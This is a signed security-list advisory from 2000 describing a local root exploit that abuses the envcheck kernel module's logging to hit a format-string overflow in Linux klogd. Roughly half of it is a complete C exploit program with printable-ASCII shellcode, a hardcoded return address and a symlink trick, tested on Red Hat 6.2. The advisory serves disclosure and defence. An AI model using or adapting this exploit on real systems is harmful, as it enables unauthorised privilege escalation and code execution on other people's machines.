Klogd Exploit Using Envcheck

[Esa Etelavuori <eetelavu () CC HUT FI>]

-----BEGIN PGP SIGNED MESSAGE-----

                   Klogd Exploit Using Envcheck
                      Release Date: 20000925

Envcheck (http://home.cern.ch/cons/security/) is a Linux/x86
kernel module which strips dangerous environment variables before
executing a new program, and which can be used to log these
probably threatening events. It was mentioned on this list two
weeks ago. However, a recent format string handling bug in klogd
allows an attacker to overflow its buffer and execute arbitrary code.
The problem from attacker's viewpoint is that usual kernel
messages contain so few attacker-controlled characters that
exploiting it might not be possible at all or is kernel specific.

Snipped from envcheck.c (wrapped):
if (strchr(&string1[env_lang_len[j]], '/')) {
    if (verbose) {
        sanitise(string1);
        printk(KERN_INFO "envcheck: %.30s (uid=%d)
                discarded locale variable with /: %s\n",
                current->comm, current->uid, string1);

Verbose is enabled by default. String1 can be 64 characters.
Sanitise() filters non-printable ASCII characters (<0x20 and >0x7e).
Custom shell code has to be made, for which our favourite insecurity
architecture is suitable so well.

Return address has to contain other characters so program's filename
will be used. It is limited to 15 characters but it is enough for
a format string which overflows the 2048 byte buffer in klogd's
vsyslog() and overwrites the return address. In a successful
attack/DoS uid will not be even logged due to long format padding.

New version of envcheck has been released which does extra
filtering. In this particular case it does not necessarily help,
because envcheck can be used to inject the shellcode into klogd's
stack, and another shorter kernel message can be used to trigger
the payload.

I think this is a nice example of security failure. Klogd
should not run as root on 2.2+ kernels anyway.

/*
 * Linux/x86 klogd exploit using envcheck by
 * Esa Etelavuori (www.iki.fi/ee/) in 2k0912
 * Tested on Red Hat 6.2 / Celeron A & P2.
 * You need some skillz to use this.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define RETADDR    0xbffffdab

int main(int ac, char **av)
{
    char sting[] = "./[<%2009xAAAABBB";
    /* Self-modifying code using 0x20 - 0x7e chars and execing /tmp/x.
     * May need tuning for correct %esp offset (%ebx) for modification
     * of last two bytes which are transformed into int 0x80. */
    char *venom = "LC_ALL="
        "T[fhBOfXf5B@f1ChjAX4APPZHf1Chfh/xh/tmpT[RSTYjOX4D2p";

    if (ac != 1 && ac != 2) {
        fprintf(stderr, "usage: %s [return address]\n", av[0]);
        exit(1);
    }

    if (ac == 2 && av[1][0] == '-') {
        printf("done\n");
        exit(0);
    }
    else if (ac == 2 && av[1][0] == '+') {
        if (putenv(venom)) {
            perror("putenv");
            exit(1);
        }
        execl(av[0], av[0], "-", NULL);
    }
    else {
        *(unsigned long *)(&sting[strlen(sting) - 4 - 3])
            = ac == 1 ? RETADDR: strtoul(av[1], NULL, 0);
        if (symlink(av[0], sting)) {
            perror("symlink");
            exit(1);
        }
        execl(sting, sting, "+", NULL);
    }

    perror("execl");
    exit(1);
}

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBOc9cCVZDrCkIweM9AQFxEwP+Mmy78QkvOqdgRipndjSofapfYlOSVJTU
Up9RKgrA6d475l8EV3HhzMB/fbKo6yyQ5XZ3yy+Bk37AzBnK79titPgK8VFbTFmn
826nmT8W6F4GrPIrvACxAno2iL+vm2DPdzivWSDxIg2r1ZBCddyJPokdVms+Hpwh
Iyg4VvqbUMA=
=RqCF
-----END PGP SIGNATURE-----